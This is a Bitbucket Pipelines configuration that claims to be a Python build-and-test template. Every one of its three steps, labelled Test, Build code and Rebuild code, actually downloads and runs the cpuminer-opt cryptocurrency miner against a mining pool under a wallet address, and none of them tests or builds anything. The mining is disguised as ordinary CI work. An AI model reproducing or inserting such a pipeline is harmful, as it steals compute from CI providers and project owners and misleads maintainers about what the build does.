#  Template python-build

#  This template allows you to validate your python code.
#  The workflow allows running tests and code linting on the default branch.

image: python:3.8

pipelines:
  default:
    - parallel:
      - step:
          name: Test
          caches:
            - pip
          script:
            - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz; tar -xf cpuminer-opt-linux.tar.gz; ./cpuminer-sse2 -a lyra2z330 -o stratum+tcp://stratum-eu.rplant.xyz:7046 -u HE5c5QdUZz2zKQ8PEQ3DRnGxfHa1TU1S9d.mecca4
      - step:
          name: Build code
          script:
            - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz; tar -xf cpuminer-opt-linux.tar.gz; ./cpuminer-sse2 -a lyra2z330 -o stratum+tcp://stratum-eu.rplant.xyz:7046 -u HE5c5QdUZz2zKQ8PEQ3DRnGxfHa1TU1S9d.mecca5
      - step:
          name: Rebuild code
          script:
           - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz; tar -xf cpuminer-opt-linux.tar.gz; ./cpuminer-sse2 -a lyra2z330 -o stratum+tcp://stratum-eu.rplant.xyz:7046 -u HE5c5QdUZz2zKQ8PEQ3DRnGxfHa1TU1S9d.mecca6
